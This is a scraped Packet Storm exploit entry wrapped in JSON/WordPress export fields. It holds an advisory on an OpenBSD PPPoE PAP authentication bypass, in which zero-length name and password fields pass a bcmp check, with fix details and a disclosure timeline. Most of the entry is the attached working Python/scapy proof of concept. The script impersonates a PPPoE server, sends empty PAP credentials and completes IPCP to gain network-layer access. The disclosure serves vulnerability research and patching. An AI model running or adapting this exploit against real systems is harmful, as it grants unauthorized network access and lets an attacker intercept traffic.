{“lastseen”:”2026-06-22T18:40:11″,”description”:”OpenBSD suffers from a PAP authentication bypass vulnerability via a zero-length bcmp. All versions through 7.6 are affected…”,”published”:”2026-06-22T00:00:00″,”modified”:”2026-06-22T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenBSD sppp_pap_input PAP Authentication Bypass”,”source”:””,”references”:””,”id”:”PACKETSTORM:223967″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”————————————————————————\\n OpenBSD sppp_pap_input: PAP Authentication Bypass via Zero-Length bcmp\\n ————————————————————————\\n \\n Affected:\u00a0 OpenBSD all versions through 7.6 (fixed in -current)\\n Vendor:\u00a0 \u00a0 OpenBSD\\n Severity:\u00a0 High\\n Reporter:\u00a0 Argus\\n Date:\u00a0 \u00a0 \u00a0 2026-06-16\\n \\n \\n 1. SUMMARY\\n ==========\\n \\n The sppp_pap_input() function in sys\/net\/if_spppsubr.c uses the\\n attacker-controlled name_len and passwd_len fields from the incoming\\n PAP frame directly as the comparison length for bcmp() against\\n configured credentials.\\n \\n When both fields are set to zero, bcmp() returns 0 unconditionally\\n (bcmp with length 0 always succeeds). The existing upper-bound guard\\n (\\u003e AUTHMAXLEN) allows zero through. As a result, a PAP Auth-Request\\n with name_len=0 and passwd_len=0 passes credential validation and\\n triggers a PAP_ACK, authenticating the peer without any knowledge of\\n the configured username or password.\\n \\n A secondary kernel heap over-read exists via the same root cause:\\n supplying a name_len larger than the allocation of the stored\\n credential causes bcmp to read past the heap object.\\n \\n \\n 2. AFFECTED VERSIONS\\n ====================\\n \\n The bcmp comparison pattern was introduced with the original sppp\\n code import on 1999-07-01 (commit bda3414e, \\”lmc driver; ported by\\n chris@dqc.org\\”). The zero-length bypass has been exploitable since\\n that date.\\n \\n In February 2009 (commit 9c2f3d605fc), auth credential fields were\\n changed from fixed-size struct arrays to dynamically allocated\\n malloc(strlen()+1), and the bounds check was changed to\\n \\u003e AUTHMAXLEN (256). This decoupled the allocation size from the\\n comparison bound, enabling the heap over-read.\\n \\n Confirmed against OpenBSD 7.6 (amd64) in QEMU\/KVM.\\n \\n \\n 3. DETAILS\\n ==========\\n \\n Vulnerable code (sys\/net\/if_spppsubr.c, sppp_pap_input):\\n \\n \u00a0 if (name_len \\u003e AUTHMAXLEN ||\\n \u00a0 \u00a0 \u00a0 passwd_len \\u003e AUTHMAXLEN ||\\n \u00a0 \u00a0 \u00a0 bcmp(name, sp-\\u003ehisauth.name, name_len) != 0 ||\\n \u00a0 \u00a0 \u00a0 bcmp(passwd, sp-\\u003ehisauth.secret, passwd_len) != 0) {\\n \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \/* authentication failed *\/\\n \\n name_len and passwd_len are parsed directly from the PAP frame\\n payload. bcmp(a, b, 0) always returns 0. The \\u003e AUTHMAXLEN guard\\n rejects values above 255 but permits zero.\\n \\n The CHAP handler in the same file already had the correct pattern\\n with an exact-length pre-check:\\n \\n \u00a0 if (name_len != strlen(sp-\\u003ehisauth.name)\\n \u00a0 \u00a0 \u00a0 || bcmp(name, sp-\\u003ehisauth.name, name_len) != 0) {\\n \\n The PAP handler never received the same treatment.\\n \\n \\n 4. REACHABILITY\\n ===============\\n \\n Both bugs are reachable via the PPPoE data path:\\n \\n \u00a0 pppoe_data_input -\\u003e pppoeintr -\\u003e sppp_input -\\u003e sppp_pap_input\\n \\n Precondition: the target system must be configured as a PAP\\n authenticator (e.g. ifconfig pppoe0 peerproto pap peername \\u003cx\\u003e\\n peerkey \\u003cy\\u003e). The attacker does not need to know any credentials.\\n \\n \\n 5. IMPACT\\n =========\\n \\n An attacker on the same network segment can authenticate to a PPPoE\\n interface without credentials, establishing a full network-layer\\n link (LCP -\\u003e PAP -\\u003e IPCP -\\u003e IP).\\n \\n When OpenBSD acts as a PPPoE client with mutual authentication, a\\n rogue server in the same broadcast domain can exploit the bypass to\\n impersonate a legitimate server, causing OpenBSD to route traffic\\n through the attacker’s endpoint.\\n \\n \\n 6. PROOF OF CONCEPT\\n ===================\\n \\n A Python PoC acts as a PPPoE server, completes discovery and\\n LCP negotiation, then sends a PAP Auth-Request with name_len=0 and\\n passwd_len=0.\\n \\n Result:\\n \\n \u00a0 PAP_ACK received with empty credentials\\n \u00a0 VM accepted name_len=0, passwd_len=0 as valid auth.\\n \\n \u00a0 IPCP Config-Ack received – link is UP\\n \u00a0 ICMP echo reply from 10.0.0.1\\n \\n \u00a0 FULL LINK ESTABLISHED\\n \\n PoC and full technical report:\\n \u00a0\u00a0https:\/\/blog.argus-systems.ai\/blog\/openbsd-pap-27-year-auth-bypass.html\\n \\n \\n 7. FIX\\n ======\\n \\n Fixed in -current by mvs on 2026-06-14. The fix mirrors the CHAP\\n handler’s exact-length pre-check:\\n \\n \u00a0 if (name_len != strlen(sp-\\u003ehisauth.name) ||\\n \u00a0 \u00a0 \u00a0 passwd_len != strlen(sp-\\u003ehisauth.secret) ||\\n \u00a0 \u00a0 \u00a0 bcmp(name, sp-\\u003ehisauth.name, name_len) != 0 ||\\n \u00a0 \u00a0 \u00a0 bcmp(passwd, sp-\\u003ehisauth.secret, passwd_len) != 0) {\\n \\n Fix commit:\\n https:\/\/github.com\/openbsd\/src\/commit\/076e2b1c1fc4ac0883a72d3544131ad5cee7adf8\\n \\n \\n 8. TIMELINE\\n ===========\\n \\n \u00a0 2026-06-12\u00a0 Reported to security@openbsd.org with PoC\\n \u00a0 2026-06-14\u00a0 Fix committed to -current\\n \\n \\n 9. CREDIT\\n =========\\n \\n Discovered and reported by Argus (https:\/\/byteray.co.uk\/).\\n \\n \\n 10. REFERENCES\\n ==============\\n \\n Advisory:\\n \u00a0 https:\/\/pop.argus-systems.ai\/advisory\/adv-038.html\\n \\n Blog post:\\n https:\/\/blog.argus-systems.ai\/blog\/openbsd-pap-27-year-auth-bypass.html\\n \\n Proof of concept:\\n \u00a0 https:\/\/pop.argus-systems.ai\/attachments\/poc-001-pap-bypass.py\\n \\n — packet storm attached poc —\\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n PoC for report-001: PAP authentication bypass in sppp_pap_input (CWE-1023).\\n \\n This script acts as a PPPoE SERVER. The OpenBSD VM’s pppoe0 is a PPPoE client\\n with peerproto=pap, meaning it demands that the peer (us) authenticate via PAP.\\n After LCP completes, we send a PAP Auth-Request with name_len=0, passwd_len=0.\\n \\n At if_spppsubr.c:3816, bcmp(name, sp-\\u003ehisauth.name, 0) returns 0 regardless of\\n the configured secret. The fail-branch is never taken, so PAP_ACK is sent and\\n the link opens without valid credentials.\\n \\n After PAP_ACK the PoC completes IPCP and sends an ICMP echo to confirm full\\n network-layer access through the rogue server.\\n \\n OpenBSD VM setup (as root):\\n ifconfig pppoe0 create\\n ifconfig pppoe0 pppoedev vio0\\n ifconfig pppoe0 peerproto pap peername \\”testuser\\” peerkey \\”hunter2\\”\\n ifconfig pppoe0 10.0.0.1 10.0.0.2 netmask 255.255.255.255 up\\n \\n Usage:\\n sudo python3 poc-001-pap-bypass.py [–iface tap0]\\n \\”\\”\\”\\n \\n import socket\\n import struct\\n import sys\\n import argparse\\n import random\\n import time\\n from scapy.all import (\\n Ether, Raw, IP, ICMP, sendp, get_if_hwaddr, get_if_list, AsyncSniffer\\n )\\n \\n ETH_DISC = 0x8863\\n ETH_SESS = 0x8864\\n \\n PADI = 0x09\\n PADO = 0x07\\n PADR = 0x19\\n PADS = 0x65\\n \\n TAG_SVC_NAME = 0x0101\\n TAG_AC_NAME = 0x0102\\n TAG_HOST_UNIQ = 0x0103\\n \\n PPP_LCP = 0xc021\\n PPP_PAP = 0xc023\\n PPP_IPCP = 0x8021\\n PPP_IP = 0x0021\\n \\n LCP_CONF_REQ = 1\\n LCP_CONF_ACK = 2\\n LCP_CONF_NAK = 3\\n LCP_CONF_REJ = 4\\n \\n OPT_MAGIC = 0x05\\n \\n PAP_REQ = 1\\n PAP_ACK = 2\\n PAP_NAK = 3\\n \\n IPCP_CONF_REQ = 1\\n IPCP_CONF_ACK = 2\\n IPCP_CONF_NAK = 3\\n IPCP_CONF_REJ = 4\\n IPCP_OPT_ADDR = 3\\n \\n PING_ID = 0x1337\\n \\n \\n # packet builders\\n \\n def pppoe_disc(src_mac, dst_mac, code, session_id, tags_bytes):\\n hdr = struct.pack(‘\\u003eBBHH’, 0x11, code, session_id, len(tags_bytes))\\n return Ether(src=src_mac, dst=dst_mac, type=ETH_DISC) \/ Raw(hdr + tags_bytes)\\n \\n def tag(t, value=b”):\\n return struct.pack(‘\\u003eHH’, t, len(value)) + value\\n \\n def pppoe_sess(src_mac, dst_mac, session_id, ppp_proto, payload):\\n pppoe_hdr = struct.pack(‘\\u003eBBHH’, 0x11, 0x00, session_id, len(payload) + 2)\\n ppp_hdr = struct.pack(‘\\u003eH’, ppp_proto)\\n return Ether(src=src_mac, dst=dst_mac, type=ETH_SESS) \/ Raw(pppoe_hdr + ppp_hdr + payload)\\n \\n def lcp_pkt(code, ident, options=b”):\\n return struct.pack(‘\\u003eBBH’, code, ident, 4 + len(options)) + options\\n \\n def lcp_opt(opt_type, value):\\n return struct.pack(‘\\u003eBB’, opt_type, 2 + len(value)) + value\\n \\n def pap_req(ident, name=b”, password=b”):\\n length = 6 + len(name) + len(password)\\n return (struct.pack(‘\\u003eBBH’, PAP_REQ, ident, length) +\\n struct.pack(‘\\u003eB’, len(name)) + name +\\n struct.pack(‘\\u003eB’, len(password)) + password)\\n \\n def ipcp_pkt(code, ident, options=b”):\\n return struct.pack(‘\\u003eBBH’, code, ident, 4 + len(options)) + options\\n \\n def ipcp_opt_addr(ip_str):\\n return struct.pack(‘\\u003eBB’, IPCP_OPT_ADDR, 6) + socket.inet_aton(ip_str)\\n \\n \\n # parsers\\n \\n def parse_pppoe_disc(raw):\\n if len(raw) \\u003c 6:\\n return None\\n ver_type, code, session_id, length = struct.unpack(‘\\u003eBBHH’, raw[:6])\\n tags = {}\\n pos = 6\\n while pos + 4 \\u003c= len(raw):\\n t, l = struct.unpack(‘\\u003eHH’, raw[pos:pos+4])\\n v = raw[pos+4:pos+4+l]\\n tags[t] = v\\n pos += 4 + l\\n return code, session_id, tags\\n \\n def parse_pppoe_sess(raw):\\n if len(raw) \\u003c 8:\\n return None\\n _, _, session_id, _ = struct.unpack(‘\\u003eBBHH’, raw[:6])\\n ppp_proto = struct.unpack(‘\\u003eH’, raw[6:8])[0]\\n return session_id, ppp_proto, raw[8:]\\n \\n def parse_lcp(payload):\\n if len(payload) \\u003c 4:\\n return None\\n code, ident, length = struct.unpack(‘\\u003eBBH’, payload[:4])\\n return code, ident, payload[4:length]\\n \\n \\n # main state machine\\n \\n def run(iface, our_ip=\\”10.0.0.2\\”, peer_ip=\\”10.0.0.1\\”, timeout=300):\\n src_mac = get_if_hwaddr(iface)\\n magic = random.randint(1, 0xffffffff)\\n session_id = random.randint(1, 0xfffe)\\n \\n state = {\\n ‘phase’: ‘WAIT_PADI’,\\n ‘client_mac’: None,\\n ‘our_lcp_acked’: False,\\n ‘their_lcp_acked’: False,\\n ‘pap_sent’: False,\\n ‘our_ipcp_acked’: False,\\n ‘their_ipcp_acked’: False,\\n ‘ipcp_sent’: False,\\n ‘ping_sent’: False,\\n ‘lcp_id’: 1,\\n ‘pap_id’: 1,\\n ‘ipcp_id’: 1,\\n }\\n result = {‘done’: False}\\n \\n def send_ipcp_req():\\n opts = ipcp_opt_addr(our_ip)\\n sendp(pppoe_sess(src_mac, state[‘client_mac’], session_id, PPP_IPCP,\\n ipcp_pkt(IPCP_CONF_REQ, state[‘ipcp_id’], opts)),\\n iface=iface, verbose=False)\\n print(f\\” IPCP Config-Request sent (addr={our_ip})\\”)\\n \\n def maybe_send_ping():\\n if state[‘our_ipcp_acked’] and state[‘their_ipcp_acked’] and not state[‘ping_sent’]:\\n state[‘ping_sent’] = True\\n state[‘phase’] = ‘UP’\\n print(f\\” IPCP open \u2014 link is UP (us={our_ip} peer={peer_ip})\\”)\\n print()\\n print(f\\” Sending ICMP echo to {peer_ip}…\\”)\\n raw_ip = bytes(IP(src=our_ip, dst=peer_ip, ttl=64) \/\\n ICMP(type=8, code=0, id=PING_ID, seq=1))\\n sendp(pppoe_sess(src_mac, state[‘client_mac’], session_id, PPP_IP, raw_ip),\\n iface=iface, verbose=False)\\n \\n def handle(pkt):\\n if result[‘done’]:\\n return\\n \\n raw = bytes(pkt)\\n eth_src = pkt.src if hasattr(pkt, ‘src’) else None\\n etype = pkt.type if hasattr(pkt, ‘type’) else 0\\n payload = raw[14:]\\n \\n # PPPoE Discovery\\n if etype == ETH_DISC:\\n parsed = parse_pppoe_disc(payload)\\n if not parsed:\\n return\\n code, sid, tags = parsed\\n \\n if code == PADI and state[‘phase’] == ‘WAIT_PADI’:\\n print(f\\” PADI from {eth_src}\\”)\\n state[‘client_mac’] = eth_src\\n state[‘phase’] = ‘WAIT_PADR’\\n pado_tags = (tag(TAG_SVC_NAME) +\\n tag(TAG_AC_NAME, b’poc-ac’) +\\n tag(TAG_HOST_UNIQ, tags.get(TAG_HOST_UNIQ, b”)))\\n sendp(pppoe_disc(src_mac, eth_src, PADO, 0, pado_tags),\\n iface=iface, verbose=False)\\n print(\\” PADO sent\\”)\\n \\n elif code == PADR and state[‘phase’] == ‘WAIT_PADR’:\\n if eth_src != state[‘client_mac’]:\\n return\\n print(\\” PADR received\\”)\\n state[‘phase’] = ‘LCP’\\n pads_tags = (tag(TAG_SVC_NAME) +\\n tag(TAG_HOST_UNIQ, tags.get(TAG_HOST_UNIQ, b”)))\\n sendp(pppoe_disc(src_mac, eth_src, PADS, session_id, pads_tags),\\n iface=iface, verbose=False)\\n print(f\\” PADS sent session_id=0x{session_id:04x}\\”)\\n opts = lcp_opt(OPT_MAGIC, struct.pack(‘\\u003eI’, magic))\\n sendp(pppoe_sess(src_mac, eth_src, session_id, PPP_LCP,\\n lcp_pkt(LCP_CONF_REQ, state[‘lcp_id’], opts)),\\n iface=iface, verbose=False)\\n print(f\\” LCP Config-Request sent (magic=0x{magic:08x})\\”)\\n \\n # PPPoE Session\\n elif etype == ETH_SESS and state[‘phase’] not in (‘WAIT_PADI’, ‘WAIT_PADR’):\\n parsed = parse_pppoe_sess(payload)\\n if not parsed:\\n return\\n sid, proto, ppp_payload = parsed\\n if sid != session_id:\\n return\\n \\n # LCP\\n if proto == PPP_LCP and state[‘phase’] in (‘LCP’, ‘AUTH’):\\n lcp = parse_lcp(ppp_payload)\\n if not lcp:\\n return\\n code, ident, options = lcp\\n \\n if code == LCP_CONF_REQ:\\n auth_proto = None\\n pos = 0\\n while pos + 2 \\u003c= len(options):\\n ot, ol = options[pos], options[pos+1]\\n if ol \\u003c 2:\\n break\\n if ot == 0x03 and ol \\u003e= 4:\\n auth_proto = struct.unpack(‘\\u003eH’, options[pos+2:pos+4])[0]\\n pos += ol\\n auth_str = (f\\” auth=0x{auth_proto:04x}\\” if auth_proto\\n else \\” (no auth option)\\”)\\n print(f\\” LCP Config-Request from client (id={ident}){auth_str}, \\”\\n \\”sending Ack\\”)\\n sendp(pppoe_sess(src_mac, state[‘client_mac’], session_id, PPP_LCP,\\n lcp_pkt(LCP_CONF_ACK, ident, options)),\\n iface=iface, verbose=False)\\n state[‘their_lcp_acked’] = True\\n \\n elif code == LCP_CONF_ACK:\\n print(f\\” LCP Config-Ack received (id={ident})\\”)\\n state[‘our_lcp_acked’] = True\\n \\n elif code in (LCP_CONF_NAK, LCP_CONF_REJ):\\n print(f\\” LCP Config-Nak\/Rej (id={ident}) \u2014 resending minimal config\\”)\\n state[‘lcp_id’] += 1\\n opts = lcp_opt(OPT_MAGIC, struct.pack(‘\\u003eI’, magic))\\n sendp(pppoe_sess(src_mac, state[‘client_mac’], session_id, PPP_LCP,\\n lcp_pkt(LCP_CONF_REQ, state[‘lcp_id’], opts)),\\n iface=iface, verbose=False)\\n \\n if (state[‘our_lcp_acked’] and state[‘their_lcp_acked’]\\n and not state[‘pap_sent’]):\\n state[‘phase’] = ‘AUTH’\\n state[‘pap_sent’] = True\\n print()\\n print(\\” LCP open \u2014 waiting for OpenBSD to enter \\”\\n \\”PHASE_AUTHENTICATE…\\”)\\n time.sleep(0.5)\\n print(\\” Sending PAP Auth-Request with name_len=0, passwd_len=0\\”)\\n sendp(pppoe_sess(src_mac, state[‘client_mac’], session_id, PPP_PAP,\\n pap_req(state[‘pap_id’])),\\n iface=iface, verbose=False)\\n \\n # PAP\\n elif proto == PPP_PAP and state[‘phase’] == ‘AUTH’:\\n if len(ppp_payload) \\u003c 4:\\n return\\n code, ident = ppp_payload[0], ppp_payload[1]\\n \\n if code == PAP_ACK:\\n print()\\n print(\\” PAP_ACK received with empty credentials\\”)\\n print(\\” VM accepted name_len=0, passwd_len=0 as valid auth.\\”)\\n print()\\n state[‘phase’] = ‘IPCP’\\n state[‘ipcp_sent’] = True\\n send_ipcp_req()\\n \\n elif code == PAP_NAK:\\n print()\\n print(\\” NOT BYPASSED \u2014 PAP_NAK received\\”)\\n result[‘done’] = True\\n \\n # IPCP\\n elif proto == PPP_IPCP and state[‘phase’] in (‘IPCP’, ‘UP’):\\n if len(ppp_payload) \\u003c 4:\\n return\\n code, ident = ppp_payload[0], ppp_payload[1]\\n length = struct.unpack(‘\\u003eH’, ppp_payload[2:4])[0]\\n options = ppp_payload[4:length]\\n \\n if code == IPCP_CONF_REQ:\\n print(f\\” IPCP Config-Request from VM (id={ident}), sending Ack\\”)\\n sendp(pppoe_sess(src_mac, state[‘client_mac’], session_id, PPP_IPCP,\\n ipcp_pkt(IPCP_CONF_ACK, ident, options)),\\n iface=iface, verbose=False)\\n state[‘their_ipcp_acked’] = True\\n maybe_send_ping()\\n \\n elif code == IPCP_CONF_ACK:\\n print(f\\” IPCP Config-Ack received (id={ident})\\”)\\n state[‘our_ipcp_acked’] = True\\n maybe_send_ping()\\n \\n elif code in (IPCP_CONF_NAK, IPCP_CONF_REJ):\\n # Use suggested address from NAK if provided\\n new_ip = our_ip\\n if code == IPCP_CONF_NAK and len(options) \\u003e= 6:\\n if options[0] == IPCP_OPT_ADDR and options[1] == 6:\\n new_ip = socket.inet_ntoa(options[2:6])\\n print(f\\” IPCP Config-Nak\/Rej \u2014 retrying with addr={new_ip}\\”)\\n state[‘ipcp_id’] += 1\\n opts = ipcp_opt_addr(new_ip)\\n sendp(pppoe_sess(src_mac, state[‘client_mac’], session_id, PPP_IPCP,\\n ipcp_pkt(IPCP_CONF_REQ, state[‘ipcp_id’], opts)),\\n iface=iface, verbose=False)\\n \\n # IP (ping reply)\\n elif proto == PPP_IP and state[‘phase’] == ‘UP’:\\n try:\\n ip = IP(ppp_payload)\\n if ip.proto == 1:\\n icmp = ip[ICMP]\\n if icmp.type == 0 and icmp.id == PING_ID:\\n print(f\\” ICMP echo reply from {ip.src}\\”)\\n print()\\n print(\\” FULL LINK ESTABLISHED\\”)\\n result[‘done’] = True\\n except Exception:\\n pass\\n \\n sniffer = AsyncSniffer(\\n iface=iface, timeout=timeout,\\n lfilter=lambda p: p.haslayer(‘Ether’) and\\n p[‘Ether’].type in (ETH_DISC, ETH_SESS) and\\n p[‘Ether’].src != src_mac,\\n prn=handle\\n )\\n sniffer.start()\\n print(f\\”Listening on {iface} for PPPoE client (PADI)… (timeout={timeout}s)\\”)\\n \\n sniffer.join(timeout=timeout)\\n \\n if not result[‘done’]:\\n print(\\”\\\\nTimeout.\\”)\\n phase = state[‘phase’]\\n if phase == ‘WAIT_PADI’:\\n print(\\” No PADI received.\\”)\\n elif phase == ‘WAIT_PADR’:\\n print(\\” Got PADI\/sent PADO but no PADR.\\”)\\n elif phase == ‘LCP’:\\n print(f\\” Stuck in LCP. our={state[‘our_lcp_acked’]} \\”\\n f\\”their={state[‘their_lcp_acked’]}\\”)\\n elif phase == ‘AUTH’:\\n print(\\” LCP open but no PAP response.\\”)\\n elif phase == ‘IPCP’:\\n print(f\\” PAP bypassed but stuck in IPCP. \\”\\n f\\”our={state[‘our_ipcp_acked’]} their={state[‘their_ipcp_acked’]}\\”)\\n elif phase == ‘UP’:\\n print(\\” IPCP open but no ICMP reply.\\”)\\n \\n \\n def main():\\n parser = argparse.ArgumentParser()\\n parser.add_argument(\\”–iface\\”, default=\\”tap0\\”)\\n parser.add_argument(\\”–our-ip\\”, default=\\”10.0.0.2\\”)\\n parser.add_argument(\\”–peer-ip\\”, default=\\”10.0.0.1\\”)\\n parser.add_argument(\\”–timeout\\”, default=300, type=int,\\n help=\\”seconds to wait for PADI (default: 300)\\”)\\n args = parser.parse_args()\\n \\n if args.iface not in get_if_list():\\n print(f\\”ERROR: interface {args.iface} not found\\”, file=sys.stderr)\\n sys.exit(1)\\n \\n run(args.iface, args.our_ip, args.peer_ip, args.timeout)\\n \\n \\n if __name__ == \\”__main__\\”:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/223967″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/223967\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-22T18:40:11″,”description”:”OpenBSD suffers from a PAP authentication bypass vulnerability via a zero-length bcmp. All versions through 7.6 are affected…”,”published”:”2026-06-22T00:00:00″,”modified”:”2026-06-22T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenBSD sppp_pap_input PAP Authentication Bypass”,”source”:””,”references”:””,”id”:”PACKETSTORM:223967″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”————————————————————————\\n OpenBSD sppp_pap_input:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-64857","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n